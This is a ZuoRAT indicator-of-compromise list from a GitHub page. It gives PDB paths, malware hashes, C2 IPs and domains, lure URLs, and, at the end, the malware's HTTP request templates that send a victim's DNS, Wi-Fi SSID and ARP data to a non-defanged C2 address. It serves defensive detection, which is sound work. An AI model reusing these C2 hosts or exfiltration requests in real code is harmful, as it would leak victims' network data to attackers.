-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathZuoRAT_IoCs.txt
107 lines (82 loc) · 5.02 KB
/
ZuoRAT_IoCs.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
PDB Paths
Test File
H:\JCQ\Test\Release\Test.pdb
Shellcode Loader Files
D:\c-code\c++\shellcode\移动\Release\sc2.pdb
D:\c-code\c++\shellcode\scopysss\Release\sc2.pdb
D:\c-code\c++\shellcode\scopysss-1\Release\sc2.pdb
D:\c-code\c++\shellcode\shellcode3\Release\sc3.pdb
D:\c-code\c++\shellcode\sxianchengcopy\Release\sc2.pdb
Injector Program
E:\code\wKillFrame\bin\x64\Release\Exec\Win64\inject_doc_cpp.pdb
CBeacon PDB Paths
D:\wuxian7\Desktop\CBeacon\x64\Release\BeaconTest.pdb
C:\Users\wuxian7\Desktop\CBeacon\x64\Release\BeaconExe.pdb
C:\JD\code\AutomaticRightsProtect\HijackCom\x64\Release\Hijack.pdb
Cobalt Strike
D:\c-code\c++\shellcode\sxianchengcopy--kehu\x64\Release\sc2.pdb
Com-Object Hijacking Program PDB Path
C:\JD\code\AutomaticRightsProtect\HijackCom\x64\Release\Hijack.pdb
Python-compiled exploitation scripts
7430b74cb4a374c0acbed1caf76cfe103d7b7861250b413602196d8dea00860f
9232382eebcb17f65fc1bfc4ae68b2bfe80ebacf9f962f4de650e9590910d04e
Extracted Python script from the executable with the malicious C2
a56e10f3a5be1ebd6716baa42699615fdc7270ce2986a1e79d041b7f44a2b71b
Router samples
asdfa.a – December 21, 2021
2f4359f91a92fa56d4aa0940ecb928042e20787b660c95e853e944ba92b02f17
Router sample – December 2020
3230ab2a8cd28ef9f463fabfb879df4ea00447605b18488d64e6fc12850371fc
Router C2 VPSs
141.98.212[.]62/asdfa.a
103.140.187[.]131
202.178.11[.]78
memthree[.]com
Windows loaders
bf34ad9b62472761393ac2de942dd95db8869d6996701cbefeb1f1b96ca18ac1
31ce9fd09c2a889fc9caf4309b0f6c8f45d9d7a7bf2d5fabdc988f478ef2d03e
71d0de00734ef06e0f528f3ef328d965788d2e312b767c0b0c8435ab7b8cfc10
ec059aaf18aca6da530e94c7e2d32f425007850b9054c3d204a2e842e36819f0
daaa12fb1dd3b637dd0e73c225e4ca55b47f2eddfda2fc0345a3fd2232276da9
1cbb9ed1b3be4a06ed0497aba34bdbb05b52f663502dce097d147b26ae84cff2
bf34ad9b62472761393ac2de942dd95db8869d6996701cbefeb1f1b96ca18ac1
c2c6e542809952450c5ef0e47db354238e38c25ac8b0240f2b5e89616f899f0a
e5063f5d97defb7e9f544ef77024650201c43e37364068ddbc05f299b42a3d5e
d8110c26e4034182c2f6689ea25d742cfe9fbd59caba449c15fb437e88e6db46
7d45957ac07fca2e9558c06447102fde70ea17e54c4f6ed76303b08ca8bc830b
URLs
https://www.yuque.com/api/docs/share/6d9a855b-d656-4f7f-86d5-e346f8738aa3?doc_slug=vucyas&from=https%3A%2F%2Fwww.yuque.com%2Fdocs%2Fshare%2F6d9a855b-d656-4f7f-86d5-e346f8738aa3%3F%23%2520%25E3%2580%258A996icu%25E3%2580%258B
https://www.yuque.com/api/docs/share/6d9a855b-d656-4f7f-86d5-e346f8738aa3?doc_slug=vucyas?from=https%3A%2F%2Fwww.yuque.com%2Fdocs%2Fshare%2F6d9a855b-d656-4f7f-86d5-e346f8738aa3%3F%23%2520%25E3%2580%258A996icu%25E3%2580%258B
https://www.yuque[.]com/api/docs/share/6d9a855b-d656-4f7f-86d5-e346f8738aa3?doc_slug=vucyas&from=https://www.yuque.com/docs/share/6d9a855b-d656-4f7f-86d5-e346f8738aa3?%23%20%E3%80%8AFuckYou%E3%80%8B
http://1.15.122[.]211/index2.html
CBeacon
938bfd8179aa43ab80753d96c2ec0e6cfdc728715e03bbb3b315f95b94bf8bc3
7d6cc68a317038eaf1a5a7b29e78ec520cac24a26980759dee036a46be4b7c3d
f9ca9a1b01f511eba0224fddb760886d8f5339bd5d4afcc6440525ec6ea90fd4
dfe1135dfcf06e4b906a97a9720dc83e41d3f1c80e93c637b94ffec927acae05
CBeacon C2s
https://service-1onwbsn4-1253943544[.]gz[.]apigw[.]tencentcs[.]com
http://82.157.69[.]219:443/api
GoBeacon
2f7ab4f79c6c0c2095d1964c414eb28c6e9513d6cfd1c01455c0c373d081290d
2918ebcbf06f5816d68ababd97c249ba3cf79d4bfab199761d6cfa40c10c1d60
Cobalt Strike
e29626e9cf755cc084adf9c08b0f6fd5750d86f5cfe580ca971c29c0110f590e
Cobalt Strike C2
110.42.185[.]232:8081/kGZQ
Files uploaded to VirusTotal by Submitter a159fa17
Python-compiled executables used for router exploitation:
• 7430b74cb4a374c0acbed1caf76cfe103d7b7861250b413602196d8dea00860f
• 9232382eebcb17f65fc1bfc4ae68b2bfe80ebacf9f962f4de650e9590910d04e
Decompiled Python script extracted from one of the Python executables above
• a56e10f3a5be1ebd6716baa42699615fdc7270ce2986a1e79d041b7f44a2b71b
Windows Loader Agent with debug string containing “JCQ”
• c2c6e542809952450c5ef0e47db354238e38c25ac8b0240f2b5e89616f899f0a
Text file of Hong Kong-based IP addresses
• c61b4b5c9f2e3d57c7b6f7471c9b869aa7a7c8d6e3b50c49ab51b09105e32340
Go agent that appears to be an IoT scanner
• 6c87397d545cc21046dbc1190048827634e23920c264c512c38bec6014c3584b
Network traffic associated with send_http_msg_php function:
"GET /dns.php?o_addr=%s&ip_addr=%s&dns=%s HTTP/1.1\r\nHost: 101.99.91.10\r\n Connection: keep-alive\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1 \r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9\ r\n\r\n"
"GET /ssid.php?o_addr=%s&i_ssid=%s&i_bssid=%s HTTP/1.1\r\nHost: 101.99.91.10 r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q= 0.9\r\n\r\n"
"GET /arp.php?o_addr=%s&int_ip=%s&int_mac=%s HTTP/1.1\r\nHost: 101.99.91.10\ r \nConnection: keep-alive\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Re quests: 1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0 .9\r\n\r\n"